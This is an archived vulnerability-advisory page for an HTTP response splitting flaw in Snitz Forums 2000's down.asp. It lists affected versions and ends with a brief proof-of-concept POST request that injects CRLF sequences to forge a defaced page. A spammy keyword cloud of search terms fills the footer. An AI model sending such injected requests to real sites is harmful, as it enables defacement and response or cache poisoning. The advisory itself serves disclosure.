about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Snitz Forums Down.ASP HTTP Response Splitting Vulnerability


Title Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
Published 2004-09-16-12:00AM
Updated 2005-01-25-06:28PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>.
Vulnerable  Snitz Forums 2000 Snitz Forums 2000 3.4 .04
Snitz Forums 2000 Snitz Forums 2000 3.4 .03
Snitz Forums 2000 Snitz Forums 2000 3.4 .02
Snitz Forums 2000 Snitz Forums 2000 3.3 .03
Microsoft IIS 4.0
Microsoft IIS 5.0
Microsoft IIS 5.1
Snitz Forums 2000 Snitz Forums 2000 3.3 .02
Microsoft IIS 4.0
Microsoft IIS 5.0
Microsoft IIS 5.1
Snitz Forums 2000 Snitz Forums 2000 3.3 .01
Microsoft IIS 4.0
Microsoft IIS 5.0
Microsoft IIS 5.1
Snitz Forums 2000 Snitz Forums 2000 3.3
Microsoft IIS 4.0
Microsoft IIS 5.0
Microsoft IIS 5.1
Snitz Forums 2000 Snitz Forums 2000 3.1
Microsoft IIS 4.0
Microsoft IIS 5.0
Microsoft IIS 5.1
Snitz Forums 2000 Snitz Forums 2000 3.0
Microsoft IIS 4.0
Microsoft IIS 5.0
Microsoft IIS 5.1
Not Vulnerable  
Code   The following proof of concept is available:

POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134

location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}

(replace curly braces with less than and greater than symbols)
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 14:26:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex 18 SEX XXX WA ms05-0 1.3 Www.Xxx sa php-nuke 2 netvault FlashChat Sex korea www.duocai www.pzmov. Www.Poojas Potho bugi www.sfkk.n Bloofilm+m my sql southindia www.chenji xxx free www.enqq.c OpenSSH hiphop boo www.sex vi TinyWebGal Sex korea &amp;a sax vidoe microsoft Free video hardndirty www.enqq.c www.hnwans showthread aman kuzum Kabul sex Internet.S components 200 /compo mara dona crack data Netware Blue F 5NP0D2KNQY taobaowang search/exp www.icamte www indian www.batle Wap sex HalfLife